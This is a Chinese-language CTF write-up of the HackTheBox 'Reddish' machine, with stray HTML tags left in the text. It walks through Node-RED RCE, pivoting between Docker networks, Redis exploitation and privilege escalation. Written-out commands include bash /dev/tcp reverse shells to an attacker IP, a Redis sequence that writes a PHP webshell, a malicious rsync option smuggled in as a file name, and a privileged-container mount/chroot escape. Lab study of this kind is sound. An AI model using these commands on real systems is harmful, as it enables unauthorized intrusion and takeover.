HTB靶机Reddish内网渗透与Docker逃逸实战指南<\/h1>

靶机概述<\/h2>

Reddish是HTB平台上的一台复杂靶机，涉及多个网段和Docker容器之间的横向移动，最终需要通过特权容器逃逸获取完整权限。本靶机主要考察以下技术点：<\/p>

Node-RED远程代码执行漏洞利用<\/li>
Docker容器横向移动技术<\/li>
Redis未授权访问漏洞利用<\/li>
恶劣环境下的文件传输与反弹Shell技术<\/li>

特权容器逃逸技术<\/li> <\/ul>

信息收集阶段<\/h2>

初始扫描<\/h3>

目标IP: 10.10.10.94<\/li>
开放端口: 1880 (Node-RED服务)<\/li>

服务识别: Mongo-Express, Node.js<\/li> <\/ul>

外围打点 - Node-RED RCE漏洞利用<\/h2>

访问目标1880端口，发现Node-RED界面<\/li>
通过POST请求探测发现功能端点<\/li>

利用Node-RED的inject和exec节点实现RCE

参考漏洞: https:\/\/quentinkaiser.be\/pentesting\/2018\/09\/07\/node-red-rce\/<\/li> <\/ul> <\/li>

构造payload反弹Shell:

bash -i >& \/dev\/tcp\/攻击机IP\/端口 0>&1<\/span>
<\/span><\/span><\/code><\/pre><\/li>
成功获取初始立足点(172.18.0.2\/172.19.0.4)<\/li>
<\/ol>
后渗透阶段<\/h2>
Docker环境确认<\/h3>

检查根目录存在.dockerenv<\/code>文件<\/li>
确认当前处于Docker容器环境<\/li>
<\/ul>
内网探测<\/h3>
发现两个内网网段:<\/p>

172.18.0.0\/16<\/li>
172.19.0.0\/16<\/li>
<\/ul>
恶劣环境下的扫描技术<\/h4>

使用portscan.sh脚本进行初步扫描<\/li>
发现关键服务:

172.19.0.3:80 (Web服务)<\/li>
172.19.0.2:6379 (Redis)<\/li>
<\/ul>
<\/li>
<\/ol>
文件传输技术(恶劣环境下)<\/h3>
方法1: 攻击机nc+靶机bash<\/h4>
# 攻击机<\/span>
<\/span><\/span>nc -lvp 4444<\/span> < rustscan
<\/span><\/span>
<\/span><\/span># 靶机<\/span>
<\/span><\/span>cat > rustscan < \/dev\/tcp\/攻击机IP\/4444
<\/span><\/span><\/code><\/pre>方法2: Base64编码传递<\/h4>

使用在线工具将文件编码为Base64<\/li>
在目标机解码:
echo "BASE64编码"<\/span> | base64 -d > 文件名
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
方法3: 纯bash脚本+入口机web服务<\/h4>
function<\/span> __curl()<\/span> {<\/span>
<\/span><\/span>  read proto server path <<<<\/span>$(<\/span>echo ${<\/span>1\/\/\/\/ }<\/span>)<\/span>
<\/span><\/span>  DOC=<\/span>\/${<\/span>path\/\/ \/\/}<\/span>
<\/span><\/span>  HOST=<\/span>${<\/span>server\/\/:*}<\/span>
<\/span><\/span>  PORT=<\/span>${<\/span>server\/\/*:}<\/span>
<\/span><\/span>  [[<\/span> x"<\/span>${<\/span>HOST}<\/span>"<\/span> ==<\/span> x"<\/span>${<\/span>PORT}<\/span>"<\/span> ]]<\/span> &&<\/span> PORT=<\/span>80<\/span>
<\/span><\/span>
<\/span><\/span>  exec 3<>\/dev\/tcp\/${<\/span>HOST}<\/span>\/$PORT
<\/span><\/span>  echo -en "GET <\/span>${<\/span>DOC}<\/span> HTTP\/1.0\r\nHost: <\/span>${<\/span>HOST}<\/span>\r\n\r\n"<\/span> >&3<\/span>
<\/span><\/span>  (<\/span>while<\/span> read line; do<\/span>
<\/span><\/span>   [[<\/span> "<\/span>$line"<\/span> ==<\/span> $'\r'<\/span> ]]<\/span> &&<\/span> break
<\/span><\/span>  done<\/span> &&<\/span> cat)<\/span> <&3<\/span>
<\/span><\/span>  exec 3>&-
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Redis漏洞利用(172.19.0.2)<\/h3>

确认Redis未授权访问(版本4.0.9)<\/li>
写Webshell到共享目录:
redis-cli -h 172.19.0.2
<\/span><\/span>config set dir \/var\/www\/html\/f187a0ec71ce99642e4f0afbd441a68b
<\/span><\/span>config set dbfilename shell.php
<\/span><\/span>set x "<?php system(<\/span>$_GET['cmd']); ?>"<\/span>
<\/span><\/span>save
<\/span><\/span><\/code><\/pre><\/li>
通过SSRF+Redis组合攻击<\/li>
<\/ol>
Rsync提权(172.19.0.3)<\/h3>

发现定时任务使用rsync备份.rdb文件<\/li>
创建恶意文件实现提权:
# 创建反弹Shell脚本<\/span>
<\/span><\/span>echo 'bash -i >& \/dev\/tcp\/172.19.0.4\/4444 0>&1'<\/span> > shell.rdb
<\/span><\/span>
<\/span><\/span># 或者创建特殊文件名<\/span>
<\/span><\/span>touch '--rsync-command=sh shell.rdb'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
成功获取root权限并读取第一段flag<\/li>
<\/ol>
Docker特权容器逃逸(backup宿主机)<\/h3>

确认特权容器:
cat \/proc\/self\/status | grep CapEff
<\/span><\/span><\/code><\/pre><\/li>
挂载宿主机根目录实现逃逸:
mkdir \/mnt\/host
<\/span><\/span>mount \/dev\/sda1 \/mnt\/host
<\/span><\/span>chroot \/mnt\/host
<\/span><\/span><\/code><\/pre><\/li>
成功获取宿主机完整权限<\/li>
<\/ol>
关键知识点总结<\/h2>

Node-RED RCE<\/strong>: 利用可视化编程界面的功能节点实现命令执行<\/li>
恶劣环境渗透<\/strong>: 多种文件传输方法适应不同限制条件<\/li>
Redis利用<\/strong>: 写Webshell、SSRF组合攻击、Redis-Rogue-Server技术<\/li>
Rsync提权<\/strong>: 利用定时任务和通配符特性实现权限提升<\/li>
Docker逃逸<\/strong>: 特权容器挂载宿主机文件系统实现逃逸<\/li>
<\/ol>
参考资源<\/h2>

官方Writeup: https:\/\/www.c1trus.top\/37-靶机wp\/4-htb\/tracks\/1-htb-8-year-birthday\/2.reddish.html<\/li>
Node-RED RCE: https:\/\/quentinkaiser.be\/pentesting\/2018\/09\/07\/node-red-rce\/<\/li>
Docker逃逸指南: https:\/\/blog.mo60.cn\/index.php\/archives\/645.html<\/li>
<\/ol>
通过本靶机的实战演练，可以全面掌握内网渗透中常见的Docker环境突破技术，特别是恶劣条件下的生存和横向移动技巧。<\/p>